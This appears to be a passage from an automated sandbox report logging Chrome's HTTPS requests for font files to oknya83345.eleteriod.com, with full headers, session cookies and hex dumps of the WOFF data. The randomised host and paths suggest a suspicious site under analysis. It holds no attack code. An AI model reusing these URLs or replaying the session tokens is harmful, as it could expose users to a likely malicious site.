                          2024-05-22 15:57:22 UTC1369INData Raw: 00 6a 07 4d d1 ff 28 8b fc 6c d2 51 9d 0e 83 9d 22 5c e7 48 fc 92 05 99 2d cc c3 68 90 eb c1 5c 1c b1 24 18 71 2e 08 a3 6c db c7 5b cb 58 47 63 ba 7c 3d 91 9d bf 11 44 11 fd a1 6b 70 7b ee c6 de 50 49 44 db ef aa dc 2c 43 d6 77 cc 1f aa ac 43 7b cb 87 68 e6 c2 24 ef 71 39 38 ea ca 50 a1 dd a1 b9 16 af e7 5b 36 1a a3 68 7d b7 d1 9b 19 9e 1c 5e da b3 75 d6 19 24 b3 60 d0 95 e7 b7 0d b0 2c 6e a1 9e a0 81 cf 5d 0e 63 53 f1 46 00 2f bb fe 1f 70 a5 9e 58 1d 8b e9 75 3b 36 ba 42 6c 18 29 19 db c5 7e 29 4e 35 47 ef 03 d3 11 c4 6b cc 5c b2 8c 98 87 f1 b4 13 7a 4a eb 68 53 1d d1 cd 11 38 50 f8 a2 27 ad a6 67 78 4b 59 17 a6 07 71 e0 18 1c 10 0b 1d 4d 5f a1 68 c3 41 66 ce 84 77 dd 8c a7 e9 0d 2d 3e d3 90 90 f7 e2 a7 6d b2 50 7a fd 83 9e 09 59 ba 40 ff ba d9 2a 6d a3
                          Data Ascii: jM(lQ"\H-h\$q.l[XGc|=Dkp{PID,CwC{h$q98P[6h}^u$`,n]cSF/pXu;6Bl)~)N5Gk\zJhS8P'gxKYqM_hAfw->mPzY@*m
                          2024-05-22 15:57:22 UTC1369INData Raw: f5 67 15 d4 4b a0 1c 83 ae 60 ec ae 01 51 24 52 a8 17 ec d7 e5 02 86 d6 f7 93 a3 02 4c fd 08 2e 8c 51 67 00 58 f0 b7 dd 29 00 ab bc b1 63 95 3a c0 e5 1b 8e 84 eb 18 37 bb ef 5b d7 78 fc 7d eb 19 6f bf 0f 7d 63 b3 00 00 20 24 28 4c 1c 20 c3 ee 31 20 a1 ae 01 e7 67 65 60 3c ab 00 96 58 09 ac 4a bb 44 03 43 dd 38 d9 f3 a2 2b cd a5 b3 5c 2d 6b ac c0 93 b0 6f fd 3a 04 fd 22 2e c2 be 55 37 a0 58 93 20 c4 cf 40 e9 fe 01 ff a3 bf 02 54 df f1 8b 37 d2 18 b9 b2 03 8d 66 21 96 60 25 57 88 a6 3f f3 e8 ee 9c 1a f8 ec 5f 95 a3 57 af 34 dc c0 f6 14 72 54 dc 81 7e 73 3e 7a 37 c6 fa dd 84 b2 82 b7 a0 7a 70 7b fd bf 42 d0 4f eb 28 a4 30 55 01 23 24 61 8a 97 2a 35 0e da f7 f4 cd 10 22 2c 42 aa 28 31 81 9a 39 89 24 32 0a 29 54 d2 64 c9 91 a7 40 89 a2 74 11 35 59 a3 4e 03 4d
                          Data Ascii: gK`Q$RL.QgX)c:7[x}o}c $(L 1 ge`<XJDC8+\-ko:".U7X @T7f!`%W?_W4rT~s>z7zp{BO(0U#$a*5",B(19$2)Td@t5YNM
                          2024-05-22 15:57:22 UTC1369INData Raw: 40 60 4f 3c e0 20 be 10 e4 01 3d a8 7d a6 28 9b 38 a1 c5 64 57 74 3d ec 7f 7d 08 26 bd 16 95 ea 5b 16 b0 5d d2 de b5 6e b9 e3 ae 7b 6e 6b 72 28 f0 1d 1b 15 eb 74 db 4d 9d ae bb 2f 4e a5 f6 c0 61 4c 1d c7 6e b4 0c 4d bd 43 5d 9c ee 65 37 b8 ea ff 8d 8b ca 96 bb eb 56 d5 5a 4d 90 d4 e4 b5 76 87 e4 8d 45 7d 9a 48 7b 15 e0 5a c2 73 b4 ee 2e be 04 f8 b4 7e c7 da 3d f4 f5 ed 7a 5a 3f ac 25 b2 36 32 5a f6 5f c0 4a 1d ff a4 c9 f4 bf f6 4f f8 3a c0 5c 92 fa 51 9c be bf bc 3e 88 6f 28 0a 9c e4 45 91 5e ff 83 f9 e0 35 e2 f6 53 a6 99 64 a7 9e 68 3c 39 c1 74 f8 af 2d f4 6b e8 e9 d0 0e 42 8c e0 02 a8 36 9f 40 50 6b 72 08 44 df 89 c3 a0 23 f1 be 82 8f 9f a6 6c c8 ea e2 70 81 d8 e7 08 a7 65 e7 73 8e 16 c3 78 1e d8 5f dd 27 48 e7 20 ba 7f 9a bb 53 d4 32 c3 c3 11 59 11 56
                          Data Ascii: @`O< =}(8dWt=}&[]n{nkr(tM/NaLnMC]e7VZMvE}H{Zs.~=zZ?%62Z_JO:\Q>o(E^5Sdh<9t-kB6@PkrD#lpesx_'H S2YV
                          2024-05-22 15:57:22 UTC1369INData Raw: cf 7b e2 5f aa f0 6f 0a fc 99 a3 fe 7b 4f fc 4f 15 fe 4f f1 7a c1 4f 5d c3 5e e8 fa 49 b7 d0 0e 70 d3 ad 1f fb c9 d3 33 05 10 1c 9c 8f f4 d8 f9 ab 65 5f 2e 9e fa 31 5c 0f 80 47 2e 03 e8 af 1b ab 78 90 19 8c 5c 3d 16 50 9e 10 aa b7 bb f1 96 e9 e8 50 5a 57 99 89 cb 42 8c 4f a5 c6 83 b0 72 71 d2 e9 5c 2c 8d e9 08 ac 4c 5d e9 e1 2a 2c 52 ba 08 9f 4a 8e 07 a1 28 86 32 a7 dd c8 b8 a8 8b 07 a7 74 ba 73 43 a8 e0 ea ca f2 67 58 b7 fe e2 8b 5d 0d dd c5 61 5a 55 59 9a 0f cd a5 7c b3 55 ed 6b 08 d9 3e 2e e8 14 eb a1 c6 2d 23 31 06 d3 5c 07 73 91 a5 48 f6 10 c2 65 09 59 44 d5 32 9e c2 c0 67 88 49 29 63 f6 60 86 66 ae f7 aa d0 58 94 7c 06 f4 ab 58 8e d0 72 36 8b 19 fb d1 96 1d 44 50 d7 90 6d 47 b6 20 cc 83 76 4d b5 21 b9 79 ec 7d 89 41 6e 78 78 e8 81 87 f5 4d cb 09 b0
                          Data Ascii: {_o{OOOzO]^Ip3e_.1\G.x\=PPZWBOrq\,L]*,RJ(2tsCgX]aZUY|Uk>.-#1\sHeYD2gI)c`fX|Xr6DPmG vM!y}AnxxM
                          2024-05-22 15:57:22 UTC1369INData Raw: 80 1c 69 5d bf cc a1 e8 ac ef 3b f9 0a 24 ed 13 15 ac 4d 28 6d ea 7c 96 81 ad 6b 76 cb f2 ea 9a 98 e8 b3 84 7a ce d7 ad d3 1a f7 5d b8 96 7f e0 ef fb 3e d2 ff 10 71 be 45 2d 8d b5 93 2a 9f 2a fe 87 98 cc f7 1a 0f e6 a6 af f9 2b 26 34 d7 d6 39 10 09 be 2e 9e f0 d4 8e 33 b4 8b 19 e5 a9 9d 73 66 58 9e dc dc f7 04 ae e0 53 fd d4 74 7f cd 9a 76 7c 53 74 7a b8 41 07 9a 43 e8 66 29 ea 9d 9e 9c 9f 60 5e dc a2 67 a2 89 2e 8a 3d 6a 11 03 df b2 c3 35 2d db bf 54 8e 2c e8 63 02 b6 b6 82 1f 1e 48 3c 04 3a 4d 54 d0 ba 1b 7f cf 00 55 2a 7c 3c 7a f7 c0 a9 d4 3c 3a e4 66 3e 91 cb 46 cd d4 3b 3d 5e 7c 75 77 09 fc 80 de 6b 83 b1 31 20 03 f7 52 5b 17 79 79 fc fa e3 c7 fe 67 66 0b 87 1e ce e4 67 4f 5f 86 a5 da ce f5 c1 0b 83 57 1e 81 d4 75 41 77 3a b7 59 8b b0 34 ec d4 02 d2
                          Data Ascii: i];$M(m|kvz]>qE-**+&49.3sfXStv|StzACf)`^g.=j5-T,cH<:MTU*|<z<:f>F;=^|uwk1 R[yygfgO_WuAw:Y4
                          2024-05-22 15:57:22 UTC1369INData Raw: 5b 7c 11 96 dd 39 50 c7 5c e8 b6 f3 ef e1 f8 f4 af 76 d7 04 6c a5 5b 5e a5 1f 82 e5 c8 48 75 02 05 a3 99 05 4b 0b cf 39 99 9b 44 e9 29 d2 4f e0 4d 76 5e eb d9 c9 2a 51 3c d3 98 aa 7e 11 1f 98 ae d2 2b d3 a4 f9 9a 0c b7 3d 84 70 b2 dd be ff 15 fd d3 ca ed c7 5a e4 3b 4f 4d 7e fe de f7 38 7c 59 78 f5 45 72 48 c9 b4 a5 47 d1 4f d6 15 62 27 b3 8b 70 d3 fa a2 3e a2 bc 65 ae 08 dd f4 4c 26 b8 0e bb 11 81 6e 8c ee b3 4e 29 73 93 b2 4d 47 db 14 36 f3 fd ef 69 4c 75 77 3d d1 4d 84 97 19 e8 a7 6b fe ff f9 e1 fa fd 4c a2 2c c7 1e 8d a7 96 3f 2a d7 8f 3f 1f 03 bf fd da ba fb e8 7b 75 c5 a3 0a fe 9a ef 16 b0 ec ef b4 ce b9 94 ed 47 9b 64 db 4f 4d ac 65 d4 fc 88 ba 28 3c ff 22 39 a2 6a b1 ac 41 de 47 d1 17 e3 ce e4 66 86 cf a8 ea 07 b9 46 7e 13 54 1d 4f 2d de cc 88 5a
                          Data Ascii: [|9P\vl[^HuK9D)OMv^*Q<~+=pZ;OM~8|YxErHGOb'p>eL&nN)sMG6iLuw=MkL,?*?{uGdOMe(<"9jAGfF~TO-Z


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          30192.168.2.449769188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC1398OUTGET /12BUrMGJQ5OOdz78ji9Tn5uQop50 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://oknya83345.eleteriod.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:22 UTC622INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:22 GMT
                          Content-Type: font/woff
                          Content-Length: 35970
                          Connection: close
                          Content-Disposition: inline; filename="12BUrMGJQ5OOdz78ji9Tn5uQop50"
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xx%2Bly2%2FdPs9LsruQ15laZ01B2ucwwXPCef0uDfnh9uGITN43O70%2BK6B7GyktjnVpA5F2POznLEpiGvOgn4xtrhQm3mvZlVbkHVuS6QKHrVCGER2IRJfnaDB0PknnuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
                          Server: cloudflare
                          CF-RAY: 887e00600e0142ce-EWR
                          2024-05-22 15:57:22 UTC747INData Raw: 77 4f 46 46 00 01 00 00 00 00 8c 82 00 11 00 00 00 01 24 20 00 01 00 00 00 00 8b 5c 00 00 01 26 00 00 02 93 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8b 54 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 17 df 00 00 4e b6 ed 42 8f b9 47 53 55 42 00 00 19 60 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c 10 00 00 00 46 00 00 00 60 69 c3 7b 5b 63 6d 61 70 00 00 1c 58 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 84 dc 00 00 00 2f 00 00 00 3c 29 81 01 c0 66 70 67 6d 00 00 85 0c 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 84 d4 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 21 74 00 00 52 61 00 00 9d a4 24 e0 b2 69 68 65 61 64 00 00 73 d8 00 00 00 33 00 00 00 36 1b 16 7d b8 68 68 65 61 00 00 74 0c 00 00 00
                          Data Ascii: wOFF$ \&DSIGTGPOSNBGSUB`3yOS/2F`i{[cmapX<?+cvt /<)fpgm?gaspglyf!tRa$iheads36}hheat
                          2024-05-22 15:57:22 UTC1369INData Raw: a7 02 da 41 45 b4 8b f6 d2 01 fa 90 4a e8 10 1d a6 06 6a e2 04 f6 b2 8f bb 71 26 5f c6 d7 f2 60 be 81 87 f0 50 be 91 87 f1 4d 3c 9c 6f e6 5b f8 56 1e c1 b7 f1 48 1e cb 53 78 3a cf e0 99 3c 8b 67 f3 1c 9e cb f3 78 3e 2f e0 85 bc 88 17 f3 12 5e ca cb 78 39 af e0 95 bc 8a 57 73 2e e7 f1 26 de ca 85 bc 93 8b 78 0f 17 13 f3 6a 55 4a a9 94 ae 42 d4 53 9d a7 1c 32 28 5f b5 d0 01 55 c7 d3 d5 51 9e a1 82 3c 87 e2 79 ae 6a e6 79 d8 e7 ab f3 bc 50 85 78 b1 3a c5 cb d0 b6 02 6d 2b b1 af 56 d5 fc 8a aa e5 35 68 5b 8b 7e 45 b8 57 4c dd e8 72 70 c0 07 1e f8 30 ea 19 2a 50 75 18 f9 24 4f 41 af e9 94 86 d1 b7 f1 4c 4a e1 59 e4 e5 d9 e4 e1 39 18 65 ae da 02 4c b5 c0 14 02 a6 20 2f 22 3f b0 6d e1 a5 94 08 8c 8d bc 1c bf 2b f0 cc 4a ec ab c8 00 e6 a3 9c ab 1a f8 15 ea 2a d8
                          Data Ascii: AEJjq&_`PM<o[VHSx:<gx>/^x9Ws.&xjUJBS2(_UQ<yjyPx:m+V5h[~EWLrp0*Pu$OALJY9eL /"?m+J*
                          2024-05-22 15:57:22 UTC1369INData Raw: 35 de 74 d3 5e f4 39 ff 11 7a a1 e7 db 00 aa 6a 1d 19 56 5a 57 86 48 dc 00 97 0c cb df 06 44 32 47 d0 be cf d6 47 e1 40 dc f0 9f e8 bc ef e6 e4 11 eb e1 13 bf 8f ec f1 0c fa c6 ab 90 aa 27 03 73 ec a2 5a 00 90 2e ee 04 71 d6 a8 af e9 82 6f 6a bb 7a 16 de dd 07 09 27 ab 4f 54 b9 aa 55 cd aa 5a fd 45 2d 01 d5 75 ea b0 3a a3 3e a3 38 d5 a4 ce 83 de 7c d0 df 97 52 70 75 94 92 c0 9f d8 51 f9 02 a8 d4 bf 0d 42 5d 85 3a 41 99 ea 04 a8 1d 40 1e 50 59 8d a6 7b cc dc 9e fc 2d 41 9c 5d 4e 7e e1 ae 81 59 7d 09 c9 c5 66 eb 02 ac d5 ea 24 f2 9c 78 a1 06 76 01 ed 20 75 4a f3 4a 73 10 96 d3 c5 99 53 50 7e d2 e5 2c 1e 67 be 18 f1 f2 a0 3a 07 1a 6b d4 11 70 26 01 60 40 f6 04 e9 96 a1 d1 83 3c d3 03 30 a4 9e 21 58 2e b9 e8 f5 4a d5 14 1b 2a b7 a9 57 21 b7 4c 00 a9 f7 14 b2
                          Data Ascii: 5t^9zjVZWHD2GG@'sZ.qojz'OTUZE-u:>8|RpuQB]:A@PY{-A]N~Y}f$xv uJJsSP~,g:kp&`@<0!X.J*W!L
                          2024-05-22 15:57:22 UTC1369INData Raw: 5a 7d ac de 52 27 f5 1a 9c 39 86 da a5 f6 aa 77 20 cb 62 68 0f 34 06 da 9b 6d cb 57 8e 1f aa b3 6a 87 ab 1a 2d 95 b7 c3 cd ea 20 ec e4 20 e4 58 62 d2 a1 73 2d f1 c6 01 8c ad b5 af 0c 39 56 10 ed a5 c0 9e 8a b3 24 f8 b3 0c f5 67 3c dd 1c d1 67 f8 61 5f 6f 80 8a a5 f0 7d 7e b1 da 06 f4 6d c1 dd 15 e4 87 9e 7f a2 df d2 6b 3f 0a 7c 59 82 eb 55 1a 8e e3 93 ba 16 47 b5 11 ef f0 ef 6d 8b 2b d5 ea 7e 3c b9 4e 7f c7 25 1e 2d e8 5a 17 09 60 fe 86 9a a4 72 25 2f e8 02 2b db 4d 37 e8 55 27 f5 38 65 ab 0f 1d 9a da 48 4c 4b 16 fe e6 a4 da 6f 71 df a0 ae 62 b9 65 ed bf c4 41 e5 d1 d0 46 b6 ae f5 10 75 5c 1d 06 cf fc a6 15 68 2a ac 9c da bd 26 1f f6 56 49 be c2 33 cf f4 db d8 52 bd 9e a6 69 8f 20 71 d3 03 9d 50 07 1c 1f 60 98 39 7c c4 bc 3e 14 3d d2 60 a6 15 ad 96 20 b3
                          Data Ascii: Z}R'9w bh4mWj- Xbs-9V$g<ga_o}~mk?|YUGm+~<N%-Z`r%/+M7U'8eHLKoqbeAFu\h*&VI3Ri qP`9|>=`
                          2024-05-22 15:57:22 UTC1369INData Raw: 08 29 71 c1 88 90 33 d7 58 35 64 95 ce b7 a1 21 51 be 30 47 2d b2 0e b5 9e 1d 15 6d 0b c8 96 da fa a0 ca c3 08 65 c8 4a c2 22 b7 ca 90 fe 55 ad b1 5d 3d d7 69 66 d6 59 bb ac 92 9b df 5d b4 59 47 5b a0 d6 a0 36 4b 32 2b 43 f5 17 b3 12 b6 f2 f1 06 e4 bd 46 ab 26 29 ed db 72 c8 f9 8e 27 7c d5 c0 f4 66 7f a5 04 5d b9 a5 ae 07 5d 54 ee 76 a8 3c aa ab 4e c9 d2 8a a4 2a d8 25 df fe 6b 5b 14 2a 5b 9a db fb 4b 97 75 75 4a 65 c4 dc dd 6b 7f c9 2f b5 48 99 53 57 d5 44 fb 7b 1c d4 1d 75 f0 0b a9 e2 ef b2 91 c5 37 80 af c9 ad ef 99 d5 fd 12 21 b2 25 f3 31 35 2c 45 de c5 d4 c9 93 a6 8e a5 09 bf 33 44 e7 bc f2 05 6a 36 20 00 d0 35 76 26 ee 24 8a a7 e9 2f f4 18 f0 41 b5 c0 14 14 2d 0d e8 15 76 e9 d5 5a d5 d6 45 58 cb 6c b1 fc 66 8b 95 ed 35 c3 fb b5 56 22 f1 ae 1c b8 d6
                          Data Ascii: )q3X5d!Q0G-meJ"U]=ifY]YG[6K2+CF&)r'|f]]Tv<N*%k[*[KuuJek/HSWD{u7!%15,E3Dj6 5v&$/A-vZEXlf5V"
                          2024-05-22 15:57:22 UTC1369INData Raw: 7c 3b 8f a6 4b f8 4e be 87 02 3c 86 c7 51 26 a2 09 ec 14 f1 e4 e7 d4 83 a7 f0 14 1a c8 53 79 2a f5 e6 a7 f8 29 4a e2 5f f0 2f 70 fe 34 3f 8d f3 5f f2 7f a2 cf 34 9e 46 5d f9 57 fc 2b 4a e3 67 f8 19 9c ff 9a 7f 8d f3 e9 3c 9d ae e1 19 3c 83 46 f1 4c 9e 49 f7 f0 2c 9e 45 63 78 36 cf a6 2b 79 0e cf a1 7e 88 59 cf 92 0f 51 eb 79 1c e7 f2 5c 1a cd f3 78 1e 0d e0 f9 3c 9f 46 f0 0b fc 5f d4 8d 17 f0 02 1a cc 0b 79 21 dd c0 8b 78 11 dd c6 8b 79 31 8d 44 a4 5b 42 b7 f0 52 5e 4a b7 f2 4b fc 12 8d 47 c4 5b 46 fd 79 39 2f a7 6b 79 05 af a0 eb 78 25 af a4 eb 11 07 57 d1 55 bc 9a 57 eb ff 3b c4 b9 74 35 ff 96 5f a6 cb 10 19 5f a1 3b 78 0d af a1 9b 74 84 a4 e1 3a 42 d2 5d 88 90 9b e8 76 44 c9 cd 74 b3 8e 93 94 a1 63 23 28 dc c1 3b 70 dc c9 3b 69 18 a2 64 11 0d 42 9c dc
                          Data Ascii: |;KN<Q&Sy*)J_/p4?_4F]W+Jg<<FLI,Ecx6+y~YQy\x<F_y!xy1D[BR^JKG[Fy9/kyx%WUW;t5__;xt:B]vDtc#(;p;idB
                          2024-05-22 15:57:22 UTC1369INData Raw: 4d 84 e2 4d a6 2f 86 58 3a f1 f7 51 07 8a 8e 96 dd 16 0d 2b 1a 54 94 04 e7 22 8a ea f2 9f 23 98 50 be 0e 0e a6 06 63 83 93 03 e7 82 04 ce 04 7e 0d 14 06 32 02 63 02 ab 8f 3f 75 fc 49 ff 01 7f be 7f 07 f8 73 fc ab fc cb fc 63 fd f1 fe f8 a3 95 4a 9e aa 38 27 ec 40 58 be 75 35 c5 8a 4c 9b 39 e5 af cd 65 0b 47 f9 98 13 7c ad 34 70 06 da 4c 76 52 9c f9 65 db 65 ab 93 e6 2c 71 32 9d 2c 67 8d 93 e3 6c 74 f2 9c 5d ce 1e 27 df 29 70 0e db de 61 e7 b8 f3 31 e7 1d 4e de 3f ea 6c 27 e7 cf 22 c4 ba f4 ae 36 6a b1 f6 e8 4d ad 52 8a 66 6b 9e 36 e9 39 4d d2 34 8d 53 82 86 6a 87 b6 6a a7 66 6a be 5e d5 58 bd a6 17 35 45 dd f5 ba c6 eb 0d 4d d4 0c 2d 51 86 d2 94 ae 09 ca d4 7d 5a a0 85 4a d4 7e a5 aa 9f b2 b4 59 3d d8 a7 95 4a 52 9c 16 69 8c 66 11 4d 1b da 9a 6b ae 31 f7
                          Data Ascii: MM/X:Q+T"#Pc~2c?uIscJ8'@Xu5L9eG|4pLvRee,q2,glt]')pa1N?l'"6jMRfk69M4Sjjfj^X5EM-Q}ZJ~Y=JRifMk1
                          2024-05-22 15:57:22 UTC1369INData Raw: 41 1c 79 97 ab 31 c7 11 da 60 1f 5c 11 1e e6 af 33 1a c2 62 c2 63 42 82 74 a1 fe a1 29 51 1a e8 94 ce 90 11 c1 e8 fd 55 ea 80 00 bd bf 37 63 34 e0 8c 2c 4b 66 9c d1 a8 95 de 18 b4 e7 f1 5f 17 9e 58 61 2b 29 ef 5e 51 bc fe dc 90 fd 36 83 e6 2f 1c 5a 74 1b c7 77 0f ae e9 11 3e e5 77 66 b6 ed ae 69 bf 2f 33 fd cc 8a 96 23 83 05 6c 79 fd bc 92 4e e1 a4 fd d1 ae ae a6 7e 61 39 a5 77 d3 e8 6d 7e 35 7f 04 19 50 ba 2d 25 32 c2 db 0b 46 11 97 21 86 c1 cd 80 5e 40 39 c1 b9 99 03 fa 04 a2 0a 8c c2 42 fc 7c 3d dc 90 01 1b 78 b5 7f 12 1f 1d 17 c7 58 32 fd b2 62 cc 19 5c a0 3a 2e ce 18 ed 0d 38 47 30 e6 8c 2c 6b a0 8a 63 b9 87 47 ce 75 b5 9f c5 e8 e8 9f 71 7a dd 97 c9 2f 3f da fe f8 e2 bc fc c1 63 6d f7 5f ce f9 a2 56 b8 ee df f1 32 f6 7e fe 04 f6 7d ad e7 c6 8f 17 6c
                          Data Ascii: Ay1`\3bcBt)QU7c4,Kf_Xa+)^Q6/Ztw>wfi/3#lyN~a9wm~5P-%2F!^@9B|=xX2b\:.8G0,kcGuqz/?cm_V2~}l
                          2024-05-22 15:57:22 UTC158INData Raw: c2 03 28 ac 50 96 bb ef f8 1e 3c 28 7c 24 bc f6 92 80 47 fa cf 6c 9c 21 68 97 ad 5d b7 f4 2f ec 5f 77 ff 34 c9 7e 80 a9 b7 bf c0 ef cc ed 7b 44 f8 b2 bd ae ae 4d 78 98 cc b3 e4 d1 db 5c 3a d0 38 89 e8 df b0 50 15 cf 61 16 24 07 cb 32 cd 40 e4 00 51 7c 28 fa 37 2a 22 38 d0 d3 1d 25 e1 24 5e 11 20 11 ac 99 62 10 13 67 c9 2c 04 e9 1a 20 0a 5b 15 a1 23 19 7d 66 da c0 4b 7b 9a 7c 47 dc 32 2b ba b2 57 ae 78 7f 14 bd 3f 75 e5 33 ed 4f 7e 91 fd 45 74 5f 75 75 ef fb c2 fb b3 b6
                          Data Ascii: (P<(|$Gl!h]/_w4~{DMx\:8Pa$2@Q|(7*"8%$^ bg, [#}fK{|G2+Wx?u3O~Et_uu
                          2024-05-22 15:57:22 UTC1369INData Raw: bc e4 9f 37 70 64 81 6d 5a 47 51 64 73 49 7f cf c0 b9 4b 73 0f f4 e4 1c 7f b8 70 76 55 fd f4 fe ee be 33 17 9a 1e 1e 28 00 7c fd 81 76 bb a9 1d 15 6a 0b 22 04 a2 3a d8 9b e8 04 51 be d2 09 88 41 be 13 6d 85 df 15 66 70 2b 84 19 02 f7 e4 67 9f dd 6d 83 fa 0f 41 7f df 85 fa c1 28 c6 66 00 ca 63 ca bc 0e 5d f4 d7 79 7b aa 55 28 18 07 cb 5d a4 b2 51 d4 1b f4 2d 74 e9 cc 7d 37 b6 16 da 43 a6 0e d5 d7 2f 99 1a 2c 14 6d 7f d7 bf fa f0 2f b6 b0 6d 23 af 35 ec 6a 4e 4b 6b de d5 c0 16 8f 9c da f1 eb 87 6b e0 99 9e 20 2f d3 e1 99 2a 11 e7 31 b1 21 49 33 3f 51 9a 51 11 69 f4 c4 c1 78 0b 5e 8d fd ed ef 5e 06 a1 a1 65 ff 5b 94 ef 08 a9 5f 51 e4 1a cc 02 98 83 65 a4 2d 6a 8a d0 ce 83 f4 19 93 6b 66 da 18 c6 c6 60 ac c1 c9 38 e7 2d 9c 03 2f 1a 61 de a8 f0 be f0 ab 51 90
                          Data Ascii: 7pdmZGQdsIKspvU3(|vj":QAmfp+gmA(fc]y{U(]Q-t}7C/,m/m#5jNKkk /*1!I3?QQix^^e[_Qe-jkf`8-/aQ


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          31192.168.2.449772188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:21 UTC1400OUTGET /78kPf7VHCjo8RmwP45rSBdetCluv60 HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Origin: https://oknya83345.eleteriod.com
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: font
                          Referer: https://oknya83345.eleteriod.com/WPGCIMWLOYQUYKLSVXWexeqyspkahuudlxpe?MFQYAAPOWMPCFNJXWICdofoymgcxajjtkmhzggxs
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6IkdzWDYyODR6NmlZdjNJWXVjd3NjRWc9PSIsInZhbHVlIjoiRXFqNDJES1VuM2wvNXFzK3hnWmVkRFhSSHJZMGg0VVA3S2I1ZlowaWQyWVE4Y2kxMS9lVVNzbG9MOFBPWS9USWx4V0d5RjF3SU1NZGZkbm1VM214VXk0K0hQVkdwMGF6QW5qeGx6YWlJMHBVcE1HU3BaY2V3Tmp0RElWZjJxTHAiLCJtYWMiOiI1Yzc2ZmExYzU1OGFmMDc4MDFkMjFmZmM3ZjgwYjZhOTAyZjYwZmVhZGVkMGU1ZjM2N2FkODQwZmI2NTYzOTNhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlIyV0dETU5HdGx4czVsb0RvNCtWbmc9PSIsInZhbHVlIjoiSVVDWEl2cVpDNVpDZk5rQnpjaXgzSXJScGliRGg1b2R1T2FmdEdvSDMxWmZnblJFczlNWW8ydlZkSEdGVnNwYVJqaVFxeDNOTjFDQ0ZOY0x2ZXBTdElMVTR2U3dUa3h5Wnc0Zk5aa0czK1lmQ1o3K2lPQ0xKTFZUT0dNRC8yblgiLCJtYWMiOiJkYzc5NzRlN2U4NWZjMTJhZDYzYzE5MWI5ZmQxY2I0NTQ5MjY2MGRhZWFmN2JkYzIwNjJkYmRhM2EzZGVhZjNjIiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:22 UTC621INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:22 GMT
                          Content-Type: font/woff2
                          Content-Length: 28584
                          Connection: close
                          Content-Disposition: inline; filename="78kPf7VHCjo8RmwP45rSBdetCluv60"
                          CF-Cache-Status: DYNAMIC
